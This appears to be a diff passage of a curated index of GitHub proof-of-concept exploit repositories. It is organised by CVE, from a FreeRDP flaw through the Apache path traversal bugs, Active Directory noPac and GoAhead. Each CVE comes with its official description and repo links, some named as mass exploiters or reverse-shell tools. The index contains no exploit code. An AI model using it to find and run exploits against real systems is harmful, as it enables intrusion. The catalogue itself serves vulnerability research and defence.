+FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a malicious server might trigger out of bound writes in a connected client. Connections using GDI or SurfaceCommands to send graphics updates to the client might send `0` width/height or out of bound rectangles to trigger out of bound writes. With `0` width or heigth the memory allocation will be `0` but the missing bounds checks allow writing to the pointer at this (not allocated) region. This issue has been patched in FreeRDP 2.4.1.
+
+
+- [Jajangjaman/CVE-2021-41160](https://github.com/Jajangjaman/CVE-2021-41160)
+
+### CVE-2021-41184 (2021-10-26)
+
+jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `of` option of the `.position()` util from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `of` option is now treated as a CSS selector. A workaround is to not accept the value of the `of` option from untrusted sources.
+
+
+- [gabrielolivra/Exploit-Medium-CVE-2021-41184](https://github.com/gabrielolivra/Exploit-Medium-CVE-2021-41184)
+
+### CVE-2021-41277 (2021-11-17)
+
+Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
+
+
+- [Seals6/CVE-2021-41277](https://github.com/Seals6/CVE-2021-41277)
+- [tahtaciburak/CVE-2021-41277](https://github.com/tahtaciburak/CVE-2021-41277)
+- [Henry4E36/Metabase-cve-2021-41277](https://github.com/Henry4E36/Metabase-cve-2021-41277)
+- [kap1ush0n/CVE-2021-41277](https://github.com/kap1ush0n/CVE-2021-41277)
+- [z3n70/CVE-2021-41277](https://github.com/z3n70/CVE-2021-41277)
+- [kaizensecurity/CVE-2021-41277](https://github.com/kaizensecurity/CVE-2021-41277)
+- [Vulnmachines/Metabase_CVE-2021-41277](https://github.com/Vulnmachines/Metabase_CVE-2021-41277)
+- [TheLastVvV/CVE-2021-41277](https://github.com/TheLastVvV/CVE-2021-41277)
+- [zer0yu/CVE-2021-41277](https://github.com/zer0yu/CVE-2021-41277)
+- [sasukeourad/CVE-2021-41277_SSRF](https://github.com/sasukeourad/CVE-2021-41277_SSRF)
+- [frknktlca/Metabase_Nmap_Script](https://github.com/frknktlca/Metabase_Nmap_Script)
+- [chengling-ing/CVE-2021-41277](https://github.com/chengling-ing/CVE-2021-41277)
+- [RubXkuB/PoC-Metabase-CVE-2021-41277](https://github.com/RubXkuB/PoC-Metabase-CVE-2021-41277)
+
+### CVE-2021-41338 (2021-10-13)
+
+Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability
+
+
+- [Mario-Kart-Felix/firewall-cve](https://github.com/Mario-Kart-Felix/firewall-cve)
+
+### CVE-2021-41349 (2021-11-10)
+
+Microsoft Exchange Server Spoofing Vulnerability
+
+
+- [exploit-io/CVE-2021-41349](https://github.com/exploit-io/CVE-2021-41349)
+- [0xrobiul/CVE-2021-41349](https://github.com/0xrobiul/CVE-2021-41349)
+
+### CVE-2021-41351 (2021-11-10)
+
+Microsoft Edge (Chrome based) Spoofing on IE Mode
+
+
+- [JaneMandy/CVE-2021-41351-POC](https://github.com/JaneMandy/CVE-2021-41351-POC)
+
+### CVE-2021-41381 (2021-09-23)
+
+Payara Micro Community 5.2021.6 and below allows Directory Traversal.
+
+
+- [Net-hunter121/CVE-2021-41381](https://github.com/Net-hunter121/CVE-2021-41381)
+
+### CVE-2021-41511 (2021-10-04)
+
+The username and password field of login in Lodging Reservation Management System V1 can give access to any user by using SQL injection to bypass authentication.
+
+
+- [vidvansh/CVE-2021-41511](https://github.com/vidvansh/CVE-2021-41511)
+
+### CVE-2021-41560 (2021-12-15)
+
+OpenCATS through 0.9.6 allows remote attackers to execute arbitrary code by uploading an executable file via lib/FileUtility.php.
+
+
+- [Nickguitar/RevCAT](https://github.com/Nickguitar/RevCAT)
+
+### CVE-2021-41643 (2021-10-29)
+
+Remote Code Execution (RCE) vulnerability exists in Sourcecodester Church Management System 1.0 via the image upload field.
+
+
+- [hax3xploit/CVE-2021-41643](https://github.com/hax3xploit/CVE-2021-41643)
+
+### CVE-2021-41644 (2021-10-29)
+
+Remote Code Exection (RCE) vulnerability exists in Sourcecodester Online Food Ordering System 2.0 via a maliciously crafted PHP file that bypasses the image upload filters.
+
+
+- [hax3xploit/CVE-2021-41644](https://github.com/hax3xploit/CVE-2021-41644)
+
+### CVE-2021-41645 (2021-10-29)
+
+Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field. .
+
+
+- [hax3xploit/CVE-2021-41645](https://github.com/hax3xploit/CVE-2021-41645)
+
+### CVE-2021-41646 (2021-10-29)
+
+Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters..
+
+
+- [hax3xploit/CVE-2021-41646](https://github.com/hax3xploit/CVE-2021-41646)
+
+### CVE-2021-41647 (2021-10-01)
+
+An un-authenticated error-based and time-based blind SQL injection vulnerability exists in Kaushik Jadhav Online Food Ordering Web App 1.0. An attacker can exploit the vulnerable "username" parameter in login.php and retrieve sensitive database information, as well as add an administrative user.
+
+
+- [MobiusBinary/CVE-2021-41647](https://github.com/MobiusBinary/CVE-2021-41647)
+
+### CVE-2021-41648 (2021-10-01)
+
+An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
+
+
+- [MobiusBinary/CVE-2021-41648](https://github.com/MobiusBinary/CVE-2021-41648)
+
+### CVE-2021-41649 (2021-10-01)
+
+An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
+
+
+- [MobiusBinary/CVE-2021-41649](https://github.com/MobiusBinary/CVE-2021-41649)
+
+### CVE-2021-41651 (2021-10-04)
+
+A blind SQL injection vulnerability exists in the Raymart DG / Ahmed Helal Hotel-mgmt-system. A malicious attacker can retrieve sensitive database information and interact with the database using the vulnerable cid parameter in process_update_profile.php.
+
+
+- [MobiusBinary/CVE-2021-41651](https://github.com/MobiusBinary/CVE-2021-41651)
+
+### CVE-2021-41652 (2022-03-01)
+
+Insecure permissions in the file database.sdb of BatFlat CMS v1.3.6 allows attackers to dump the entire database.
+
+
+- [deathflash1411/cve-2021-41652](https://github.com/deathflash1411/cve-2021-41652)
+
+### CVE-2021-41653 (2021-11-13)
+
+The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
+
+
+- [likeww/CVE-2021-41653](https://github.com/likeww/CVE-2021-41653)
+
+### CVE-2021-41730
+- [yezeting/CVE-2021-41730](https://github.com/yezeting/CVE-2021-41730)
+
+### CVE-2021-41773 (2021-10-05)
+
+A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.
+
+
+- [Vulnmachines/cve-2021-41773](https://github.com/Vulnmachines/cve-2021-41773)
+- [numanturle/CVE-2021-41773](https://github.com/numanturle/CVE-2021-41773)
+- [knqyf263/CVE-2021-41773](https://github.com/knqyf263/CVE-2021-41773)
+- [ZephrFish/CVE-2021-41773-PoC](https://github.com/ZephrFish/CVE-2021-41773-PoC)
+- [iilegacyyii/PoC-CVE-2021-41773](https://github.com/iilegacyyii/PoC-CVE-2021-41773)
+- [masahiro331/CVE-2021-41773](https://github.com/masahiro331/CVE-2021-41773)
+- [j4k0m/CVE-2021-41773](https://github.com/j4k0m/CVE-2021-41773)
+- [TishcaTpx/POC-CVE-2021-41773](https://github.com/TishcaTpx/POC-CVE-2021-41773)
+- [lorddemon/CVE-2021-41773-PoC](https://github.com/lorddemon/CVE-2021-41773-PoC)
+- [Ls4ss/CVE-2021-41773_CVE-2021-42013](https://github.com/Ls4ss/CVE-2021-41773_CVE-2021-42013)
+- [itsecurityco/CVE-2021-41773](https://github.com/itsecurityco/CVE-2021-41773)
+- [habibiefaried/CVE-2021-41773-PoC](https://github.com/habibiefaried/CVE-2021-41773-PoC)
+- [creadpag/CVE-2021-41773-POC](https://github.com/creadpag/CVE-2021-41773-POC)
+- [TAI-REx/cve-2021-41773-nse](https://github.com/TAI-REx/cve-2021-41773-nse)
+- [blasty/CVE-2021-41773](https://github.com/blasty/CVE-2021-41773)
+- [PentesterGuruji/CVE-2021-41773](https://github.com/PentesterGuruji/CVE-2021-41773)
+- [jbovet/CVE-2021-41773](https://github.com/jbovet/CVE-2021-41773)
+- [mohwahyudi/cve-2021-41773](https://github.com/mohwahyudi/cve-2021-41773)
+- [1nhann/CVE-2021-41773](https://github.com/1nhann/CVE-2021-41773)
+- [ranggaggngntt/CVE-2021-41773](https://github.com/ranggaggngntt/CVE-2021-41773)
+- [BlueTeamSteve/CVE-2021-41773](https://github.com/BlueTeamSteve/CVE-2021-41773)
+- [Zeop-CyberSec/apache_normalize_path](https://github.com/Zeop-CyberSec/apache_normalize_path)
+- [r00tVen0m/CVE-2021-41773](https://github.com/r00tVen0m/CVE-2021-41773)
+- [n3k00n3/CVE-2021-41773](https://github.com/n3k00n3/CVE-2021-41773)
+- [fnatalucci/CVE-2021-41773-RCE](https://github.com/fnatalucci/CVE-2021-41773-RCE)
+- [AssassinUKG/CVE-2021-41773](https://github.com/AssassinUKG/CVE-2021-41773)
+- [jheeree/Simple-CVE-2021-41773-checker](https://github.com/jheeree/Simple-CVE-2021-41773-checker)
+- [orangmuda/CVE-2021-41773](https://github.com/orangmuda/CVE-2021-41773)
+- [HightechSec/scarce-apache2](https://github.com/HightechSec/scarce-apache2)
+- [vinhjaxt/CVE-2021-41773-exploit](https://github.com/vinhjaxt/CVE-2021-41773-exploit)
+- [sixpacksecurity/CVE-2021-41773](https://github.com/sixpacksecurity/CVE-2021-41773)
+- [Hattan515/POC-CVE-2021-41773](https://github.com/Hattan515/POC-CVE-2021-41773)
+- [twseptian/cve-2021-41773](https://github.com/twseptian/cve-2021-41773)
+- [noflowpls/CVE-2021-41773](https://github.com/noflowpls/CVE-2021-41773)
+- [McSl0vv/CVE-2021-41773](https://github.com/McSl0vv/CVE-2021-41773)
+- [shiomiyan/CVE-2021-41773](https://github.com/shiomiyan/CVE-2021-41773)
+- [justakazh/mass_cve-2021-41773](https://github.com/justakazh/mass_cve-2021-41773)
+- [Sakura-nee/CVE-2021-41773](https://github.com/Sakura-nee/CVE-2021-41773)
+- [shellreaper/CVE-2021-41773](https://github.com/shellreaper/CVE-2021-41773)
+- [0xRar/CVE-2021-41773](https://github.com/0xRar/CVE-2021-41773)
+- [pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt)
+- [corelight/CVE-2021-41773](https://github.com/corelight/CVE-2021-41773)
+- [zeronine9/CVE-2021-41773](https://github.com/zeronine9/CVE-2021-41773)
+- [b1tsec/CVE-2021-41773](https://github.com/b1tsec/CVE-2021-41773)
+- [superzerosec/CVE-2021-41773](https://github.com/superzerosec/CVE-2021-41773)
+- [im-hanzou/apachrot](https://github.com/im-hanzou/apachrot)
+- [inbug-team/CVE-2021-41773_CVE-2021-42013](https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013)
+- [5gstudent/cve-2021-41773-and-cve-2021-42013](https://github.com/5gstudent/cve-2021-41773-and-cve-2021-42013)
+- [EagleTube/CVE-2021-41773](https://github.com/EagleTube/CVE-2021-41773)
+- [5l1v3r1/CVE-2021-41773-42013](https://github.com/5l1v3r1/CVE-2021-41773-42013)
+- [apapedulimu/Apachuk](https://github.com/apapedulimu/Apachuk)
+- [scarmandef/CVE-2021-41773](https://github.com/scarmandef/CVE-2021-41773)
+- [ksanchezcld/httpd-2.4.49](https://github.com/ksanchezcld/httpd-2.4.49)
+- [MrCl0wnLab/SimplesApachePathTraversal](https://github.com/MrCl0wnLab/SimplesApachePathTraversal)
+- [theLSA/apache-httpd-path-traversal-checker](https://github.com/theLSA/apache-httpd-path-traversal-checker)
+- [LudovicPatho/CVE-2021-41773](https://github.com/LudovicPatho/CVE-2021-41773)
+- [lopqto/CVE-2021-41773_Honeypot](https://github.com/lopqto/CVE-2021-41773_Honeypot)
+- [zerodaywolf/CVE-2021-41773_42013](https://github.com/zerodaywolf/CVE-2021-41773_42013)
+- [LayarKacaSiber/CVE-2021-41773](https://github.com/LayarKacaSiber/CVE-2021-41773)
+- [BabyTeam1024/CVE-2021-41773](https://github.com/BabyTeam1024/CVE-2021-41773)
+- [walnutsecurity/cve-2021-41773](https://github.com/walnutsecurity/cve-2021-41773)
+- [TheLastVvV/CVE-2021-41773](https://github.com/TheLastVvV/CVE-2021-41773)
+- [MazX0p/CVE-2021-41773](https://github.com/MazX0p/CVE-2021-41773)
+- [vida003/Scanner-CVE-2021-41773](https://github.com/vida003/Scanner-CVE-2021-41773)
+- [mr-exo/CVE-2021-41773](https://github.com/mr-exo/CVE-2021-41773)
+- [wolf1892/CVE-2021-41773](https://github.com/wolf1892/CVE-2021-41773)
+- [Hydragyrum/CVE-2021-41773-Playground](https://github.com/Hydragyrum/CVE-2021-41773-Playground)
+- [IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit](https://github.com/IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit)
+- [pirenga/CVE-2021-41773](https://github.com/pirenga/CVE-2021-41773)
+- [kubota/POC-CVE-2021-41773](https://github.com/kubota/POC-CVE-2021-41773)
+- [xMohamed0/CVE-2021-41773](https://github.com/xMohamed0/CVE-2021-41773)
+- [i6c/MASS_CVE-2021-41773](https://github.com/i6c/MASS_CVE-2021-41773)
+- [norrig/CVE-2021-41773-exploiter](https://github.com/norrig/CVE-2021-41773-exploiter)
+- [m96dg/CVE-2021-41773-exercise](https://github.com/m96dg/CVE-2021-41773-exercise)
+- [skentagon/CVE-2021-41773](https://github.com/skentagon/CVE-2021-41773)
+- [mauricelambert/CVE-2021-41773](https://github.com/mauricelambert/CVE-2021-41773)
+- [the29a/CVE-2021-41773](https://github.com/the29a/CVE-2021-41773)
+- [thehackersbrain/CVE-2021-41773](https://github.com/thehackersbrain/CVE-2021-41773)
+- [honypot/CVE-2021-41773](https://github.com/honypot/CVE-2021-41773)
+- [Fa1c0n35/CVE-2021-41773](https://github.com/Fa1c0n35/CVE-2021-41773)
+- [puckiestyle/CVE-2021-41773](https://github.com/puckiestyle/CVE-2021-41773)
+- [zer0qs/CVE-2021-41773](https://github.com/zer0qs/CVE-2021-41773)
+- [DoTuan1/Reserch-CVE-2021-41773](https://github.com/DoTuan1/Reserch-CVE-2021-41773)
+- [bernardas/netsec-polygon](https://github.com/bernardas/netsec-polygon)
+- [CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit)
+- [vuongnv3389-sec/cve-2021-41773](https://github.com/vuongnv3389-sec/cve-2021-41773)
+- [Chocapikk/CVE-2021-41773](https://github.com/Chocapikk/CVE-2021-41773)
+- [wangfly-me/Apache_Penetration_Tool](https://github.com/wangfly-me/Apache_Penetration_Tool)
+- [anldori/CVE-2021-41773-Scanner](https://github.com/anldori/CVE-2021-41773-Scanner)
+- [iosifache/ApacheRCEEssay](https://github.com/iosifache/ApacheRCEEssay)
+- [Habib0x0/CVE-2021-41773](https://github.com/Habib0x0/CVE-2021-41773)
+- [pwn3z/CVE-2021-41773-Apache-RCE](https://github.com/pwn3z/CVE-2021-41773-Apache-RCE)
+- [EkamSinghWalia/Mitigation-Apache-CVE-2021-41773-](https://github.com/EkamSinghWalia/Mitigation-Apache-CVE-2021-41773-)
+- [Plunder283/CVE-2021-41773](https://github.com/Plunder283/CVE-2021-41773)
+- [mightysai1997/cve-2021-41773](https://github.com/mightysai1997/cve-2021-41773)
+- [mightysai1997/CVE-2021-41773h](https://github.com/mightysai1997/CVE-2021-41773h)
+- [mightysai1997/cve-2021-41773-v-](https://github.com/mightysai1997/cve-2021-41773-v-)
+- [mightysai1997/CVE-2021-41773-i-](https://github.com/mightysai1997/CVE-2021-41773-i-)
+- [mightysai1997/CVE-2021-41773-L-](https://github.com/mightysai1997/CVE-2021-41773-L-)
+- [mightysai1997/CVE-2021-41773-PoC](https://github.com/mightysai1997/CVE-2021-41773-PoC)
+- [mightysai1997/CVE-2021-41773.git1](https://github.com/mightysai1997/CVE-2021-41773.git1)
+- [mightysai1997/CVE-2021-41773m](https://github.com/mightysai1997/CVE-2021-41773m)
+- [mightysai1997/CVE-2021-41773S](https://github.com/mightysai1997/CVE-2021-41773S)
+- [dileepdkumar/LayarKacaSiber-CVE-2021-41773](https://github.com/dileepdkumar/LayarKacaSiber-CVE-2021-41773)
+- [aqiao-jashell/CVE-2021-41773](https://github.com/aqiao-jashell/CVE-2021-41773)
+- [aqiao-jashell/py-CVE-2021-41773](https://github.com/aqiao-jashell/py-CVE-2021-41773)
+- [12345qwert123456/CVE-2021-41773](https://github.com/12345qwert123456/CVE-2021-41773)
+- [blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution](https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution)
+- [TheKernelPanic/exploit-apache2-cve-2021-41773](https://github.com/TheKernelPanic/exploit-apache2-cve-2021-41773)
+- [retrymp3/apache2.4.49VulnerableLabSetup](https://github.com/retrymp3/apache2.4.49VulnerableLabSetup)
+- [MatanelGordon/docker-cve-2021-41773](https://github.com/MatanelGordon/docker-cve-2021-41773)
+- [0xGabe/Apache-CVEs](https://github.com/0xGabe/Apache-CVEs)
+- [OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits](https://github.com/OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits)
+- [belajarqywok/CVE-2021-41773-MSF](https://github.com/belajarqywok/CVE-2021-41773-MSF)
+- [Iris288/CVE-2021-41773](https://github.com/Iris288/CVE-2021-41773)
+- [Maybe4a6f7365/CVE-2021-41773](https://github.com/Maybe4a6f7365/CVE-2021-41773)
+
+### CVE-2021-41784 (2022-08-29)
+
+Foxit PDF Reader before 11.1 and PDF Editor before 11.1, and PhantomPDF before 10.1.6, allow attackers to trigger a use-after-free and execute arbitrary code because JavaScript is mishandled.
+
+
+- [Jeromeyoung/CVE-2021-41784](https://github.com/Jeromeyoung/CVE-2021-41784)
+
+### CVE-2021-41801 (2021-10-11)
+
+The ReplaceText extension through 1.41 for MediaWiki has Incorrect Access Control. When a user is blocked after submitting a replace job, the job is still run, even if it may be run at a later time (due to the job queue backlog)
+
+
+- [5l1v3r1/CVE-2021-41801](https://github.com/5l1v3r1/CVE-2021-41801)
+
+### CVE-2021-41805 (2021-12-12)
+
+HashiCorp Consul Enterprise before 1.8.17, 1.9.x before 1.9.11, and 1.10.x before 1.10.4 has Incorrect Access Control. An ACL token (with the default operator:write permissions) in one namespace can be used for unintended privilege escalation in a different namespace.
+
+
+- [blackm4c/CVE-2021-41805](https://github.com/blackm4c/CVE-2021-41805)
+
+### CVE-2021-41822
+- [badboycxcc/CVE-2021-41822](https://github.com/badboycxcc/CVE-2021-41822)
+
+### CVE-2021-41946 (2022-05-18)
+
+In FiberHome VDSL2 Modem HG150-Ub_V3.0, a stored cross-site scripting (XSS) vulnerability in Parental Control --> Access Time Restriction --> Username field, a user cannot delete the rule due to the XSS.
+
+
+- [afaq1337/CVE-2021-41946](https://github.com/afaq1337/CVE-2021-41946)
+
+### CVE-2021-41962 (2021-12-16)
+
+Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Owner fullname parameter in a Send Service Request in vehicle_service.
+
+
+- [lohyt/-CVE-2021-41962](https://github.com/lohyt/-CVE-2021-41962)
+
+### CVE-2021-42008 (2021-10-04)
+
+The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access.
+
+
+- [numanturle/CVE-2021-42008](https://github.com/numanturle/CVE-2021-42008)
+- [0xdevil/CVE-2021-42008](https://github.com/0xdevil/CVE-2021-42008)
+
+### CVE-2021-42013 (2021-10-07)
+
+It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.
+
+
+- [andrea-mattioli/apache-exploit-CVE-2021-42013](https://github.com/andrea-mattioli/apache-exploit-CVE-2021-42013)
+- [Vulnmachines/cve-2021-42013](https://github.com/Vulnmachines/cve-2021-42013)
+- [twseptian/cve-2021-42013-docker-lab](https://github.com/twseptian/cve-2021-42013-docker-lab)
+- [LayarKacaSiber/CVE-2021-42013](https://github.com/LayarKacaSiber/CVE-2021-42013)
+- [TheLastVvV/CVE-2021-42013](https://github.com/TheLastVvV/CVE-2021-42013)
+- [TheLastVvV/CVE-2021-42013_Reverse-Shell](https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell)
+- [walnutsecurity/cve-2021-42013](https://github.com/walnutsecurity/cve-2021-42013)
+- [robotsense1337/CVE-2021-42013](https://github.com/robotsense1337/CVE-2021-42013)
+- [xMohamed0/CVE-2021-42013-ApacheRCE](https://github.com/xMohamed0/CVE-2021-42013-ApacheRCE)
+- [asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp](https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp)
+- [rnsss/CVE-2021-42013](https://github.com/rnsss/CVE-2021-42013)
+- [jas9reet/CVE-2021-42013-LAB](https://github.com/jas9reet/CVE-2021-42013-LAB)
+- [tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway](https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway)
+- [mauricelambert/CVE-2021-42013](https://github.com/mauricelambert/CVE-2021-42013)
+- [honypot/CVE-2021-42013](https://github.com/honypot/CVE-2021-42013)
+- [Adashz/CVE-2021-42013](https://github.com/Adashz/CVE-2021-42013)
+- [hadrian3689/apache_2.4.50](https://github.com/hadrian3689/apache_2.4.50)
+- [viliuspovilaika/cve-2021-42013](https://github.com/viliuspovilaika/cve-2021-42013)
+- [mightysai1997/cve-2021-42013](https://github.com/mightysai1997/cve-2021-42013)
+- [mightysai1997/cve-2021-42013L](https://github.com/mightysai1997/cve-2021-42013L)
+- [mightysai1997/cve-2021-42013.get](https://github.com/mightysai1997/cve-2021-42013.get)
+- [12345qwert123456/CVE-2021-42013](https://github.com/12345qwert123456/CVE-2021-42013)
+- [cybfar/cve-2021-42013-httpd](https://github.com/cybfar/cve-2021-42013-httpd)
+- [vudala/CVE-2021-42013](https://github.com/vudala/CVE-2021-42013)
+- [birdlinux/CVE-2021-42013](https://github.com/birdlinux/CVE-2021-42013)
+- [Hamesawian/CVE-2021-42013](https://github.com/Hamesawian/CVE-2021-42013)
+- [K3ysTr0K3R/CVE-2021-42013-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-42013-EXPLOIT)
+- [imhunterand/CVE-2021-42013](https://github.com/imhunterand/CVE-2021-42013)
+- [BassoNicolas/CVE-2021-42013](https://github.com/BassoNicolas/CVE-2021-42013)
+
+### CVE-2021-42063 (2021-12-14)
+
+A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to disclose sensitive data.
+
+
+- [Cappricio-Securities/CVE-2021-42063](https://github.com/Cappricio-Securities/CVE-2021-42063)
+
+### CVE-2021-42071 (2021-10-07)
+
+In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.
+
+
+- [adubaldo/CVE-2021-42071](https://github.com/adubaldo/CVE-2021-42071)
+
+### CVE-2021-42171 (2022-03-14)
+
+Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth.
+
+
+- [minhnq22/CVE-2021-42171](https://github.com/minhnq22/CVE-2021-42171)
+
+### CVE-2021-42183 (2022-05-05)
+
+MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/.
+
+
+- [0xRaw/CVE-2021-42183](https://github.com/0xRaw/CVE-2021-42183)
+
+### CVE-2021-42205 (2022-11-07)
+
+ELAN Miniport touchpad Windows driver before 24.21.51.2, as used in PC hardware from multiple manufacturers, allows local users to cause a system crash by sending a certain IOCTL request, because that request is handled twice.
+
+
+- [gmh5225/CVE-2021-42205](https://github.com/gmh5225/CVE-2021-42205)
+
+### CVE-2021-42230 (2022-04-15)
+
+Seowon 130-SLC router all versions as of 2021-09-15 is vulnerable to Remote Code Execution via the queriesCnt parameter.
+
+
+- [TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated)
+
+### CVE-2021-42237 (2021-11-05)
+
+Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.
+
+
+- [ItsIgnacioPortal/CVE-2021-42237](https://github.com/ItsIgnacioPortal/CVE-2021-42237)
+- [vesperp/CVE-2021-42237-SiteCore-XP](https://github.com/vesperp/CVE-2021-42237-SiteCore-XP)
+- [crankyyash/SiteCore-RCE-Detection](https://github.com/crankyyash/SiteCore-RCE-Detection)
+
+### CVE-2021-42261 (2021-10-19)
+
+Revisor Video Management System (VMS) before 2.0.0 has a directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of restricted directory on the remote server. This could lead to the disclosure of sensitive data on the vulnerable server.
+
+
+- [jet-pentest/CVE-2021-42261](https://github.com/jet-pentest/CVE-2021-42261)
+
+### CVE-2021-42278 (2021-11-10)
+
+Active Directory Domain Services Elevation of Privilege Vulnerability
+
+
+- [safebuffer/sam-the-admin](https://github.com/safebuffer/sam-the-admin)
+- [Ridter/noPac](https://github.com/Ridter/noPac)
+- [waterrr/noPac](https://github.com/waterrr/noPac)
+- [ly4k/Pachine](https://github.com/ly4k/Pachine)
+- [cybersecurityworks553/noPac-detection](https://github.com/cybersecurityworks553/noPac-detection)
+
+### CVE-2021-42287 (2021-11-10)
+
+Active Directory Domain Services Elevation of Privilege Vulnerability
+
+
+- [cube0x0/noPac](https://github.com/cube0x0/noPac)
+- [ricardojba/Invoke-noPac](https://github.com/ricardojba/Invoke-noPac)
+- [knightswd/NoPacScan](https://github.com/knightswd/NoPacScan)
+- [XiaoliChan/Invoke-sAMSpoofing](https://github.com/XiaoliChan/Invoke-sAMSpoofing)
+- [TryA9ain/noPac](https://github.com/TryA9ain/noPac)
+
+### CVE-2021-42292 (2021-11-10)
+
+Microsoft Excel Security Feature Bypass Vulnerability
+
+
+- [corelight/CVE-2021-42292](https://github.com/corelight/CVE-2021-42292)
+
+### CVE-2021-42321 (2021-11-10)
+
+Microsoft Exchange Server Remote Code Execution Vulnerability
+
+
+- [DarkSprings/CVE-2021-42321](https://github.com/DarkSprings/CVE-2021-42321)
+- [timb-machine-mirrors/testanull-CVE-2021-42321_poc.py](https://github.com/timb-machine-mirrors/testanull-CVE-2021-42321_poc.py)
+- [xnyuq/cve-2021-42321](https://github.com/xnyuq/cve-2021-42321)
+- [7BitsTeam/exch_CVE-2021-42321](https://github.com/7BitsTeam/exch_CVE-2021-42321)
+
+### CVE-2021-42325 (2021-10-12)
+
+Froxlor through 0.10.29.1 allows SQL injection in Database/Manager/DbManagerMySQL.php via a custom DB name.
+
+
+- [AK-blank/CVE-2021-42325-](https://github.com/AK-blank/CVE-2021-42325-)
+
+### CVE-2021-42327 (2021-10-21)
+
+dp_link_settings_write in drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c in the Linux kernel through 5.14.14 allows a heap-based buffer overflow by an attacker who can write a string to the AMD GPU display drivers debug filesystem. There are no checks on size within parse_write_buffer_into_params when it uses the size of copy_from_user to copy a userspace buffer into a 40-byte heap buffer.
+
+
+- [docfate111/CVE-2021-42327](https://github.com/docfate111/CVE-2021-42327)
+
+### CVE-2021-42342 (2021-10-14)
+
+An issue was discovered in GoAhead 4.x and 5.x before 5.1.5. In the file upload filter, user form variables can be passed to CGI scripts without being prefixed with the CGI prefix. This permits tunneling untrusted environment variables into vulnerable CGI scripts.
+
+
+- [kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-](https://github.com/kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-)
+- [Mr-xn/CVE-2021-42342](https://github.com/Mr-xn/CVE-2021-42342)
